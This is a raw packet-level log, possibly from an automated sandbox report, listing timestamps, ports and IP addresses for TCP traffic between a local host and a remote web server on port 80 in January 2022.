Jan 14, 2022 13:49:23.404587030 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404614925 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404633999 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404654026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404668093 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404691935 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404711008 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404731035 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404752970 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404771090 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404795885 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404810905 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404828072 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404853106 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404871941 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404892921 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404908895 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404932022 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404951096 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404970884 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404993057 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405009031 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405036926 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405047894 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405071974 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405086994 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405100107 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405127048 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405143976 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405167103 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405181885 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405205965 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405225039 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405246019 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405261040 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405284882 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405303955 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405323029 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405339003 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405364990 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405402899 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405402899 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405419111 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405443907 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405464888 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405483961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405503035 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405519962 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405551910 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405560017 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405587912 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405599117 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405607939 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405637026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405661106 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405675888 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405698061 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405714035 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405714989 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405752897 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405792952 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.405813932 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.405857086 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552279949 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552310944 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552328110 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552345991 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552362919 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552372932 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552381039 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552398920 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552398920 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552412987 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552417040 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552436113 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552440882 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552453041 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552464008 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552472115 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552489996 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552489996 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552506924 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552516937 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552522898 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552541018 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552546024 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552556992 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552575111 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552582979 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552592039 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552604914 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552608013 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552624941 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552642107 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552656889 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552658081 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552675009 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552706003 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552716970 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552723885 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552732944 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.552778006 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.552805901 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.553077936 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.553431034 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.553605080 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.553647041 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.553726912 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.553739071 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.553949118 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.553968906 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.553986073 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.553998947 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.554035902 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.554065943 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.554136038 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.554153919 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.554202080 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.554210901 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.554219961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.554238081 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.554243088 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.554251909 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.554266930 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.554275990 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.554295063 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.554295063 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.554311037 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.554325104 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.554337025 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.554380894 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.554402113 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.554419041 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.554480076 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.707207918 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.707293034 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.707336903 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.707374096 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.709750891 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.709830046 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.709867001 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.709903002 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.709934950 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.709988117 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.709997892 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.710056067 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.710058928 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.710104942 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.710114956 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.710175037 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.710222006 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.710237026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.710293055 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.710299015 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.710357904 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.710361958 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.710414886 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.710427999 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.710493088 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.710557938 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.710562944 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.710608959 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.710621119 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.710669994 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.710684061 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.710747004 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.710794926 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.710819960 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.710867882 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.710886955 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.710947990 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711004019 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.711009979 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711071014 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.711071014 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711133957 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711188078 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.711199045 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711261034 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711316109 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.711323023 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711388111 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711441040 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.711452961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711515903 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711570978 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.711579084 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711636066 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711689949 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.711694956 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711756945 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711812019 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.711817026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711878061 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711935997 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.711937904 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.711997032 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712044001 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.712059021 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712105989 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.712116957 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712168932 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.712177992 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712224960 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.712235928 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712285042 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.712296963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712353945 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712400913 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712424040 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.712436914 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.712447882 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712479115 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.712496042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712518930 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.712536097 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.712539911 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712585926 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712631941 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712631941 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.712677956 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712723970 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712728024 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.712769032 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712814093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712817907 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.712857962 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712901115 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712903976 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.712946892 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.712995052 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713001013 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713038921 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713038921 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713080883 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713083982 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713126898 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713129044 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713174105 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713186026 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713219881 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713221073 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713264942 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713267088 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713301897 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713310003 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713355064 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713398933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713412046 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713447094 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713448048 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713490963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713504076 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713538885 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713543892 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713583946 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713586092 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713627100 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713659048 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713659048 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713685036 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713706017 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713710070 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713748932 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713753939 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713793039 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713793039 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713838100 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713839054 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713879108 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713900089 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713946104 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.713958979 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.713992119 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.714001894 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.714019060 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.714037895 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.714061975 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.106172085 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.270437956 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270529032 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270551920 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270574093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270598888 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270621061 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270627022 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.270644903 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270649910 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.270657063 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.270669937 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270694971 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270698071 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.270718098 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.270720005 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270735025 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.270742893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270759106 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.270767927 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270776987 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.270793915 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270803928 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.270818949 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270829916 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.270847082 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270870924 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270884037 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.270893097 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270915031 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270915031 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.270935059 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270946026 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.270957947 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270966053 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.270979881 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.270983934 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271002054 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271002054 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271022081 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271023989 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271042109 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271045923 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271059990 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271069050 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271079063 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271091938 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271105051 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271112919 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271123886 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271135092 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271142960 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271157026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271171093 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271178961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271189928 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271199942 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271207094 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271222115 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271234989 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271243095 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271253109 CET	49743	80	192.168.2.3	108.167.165.140
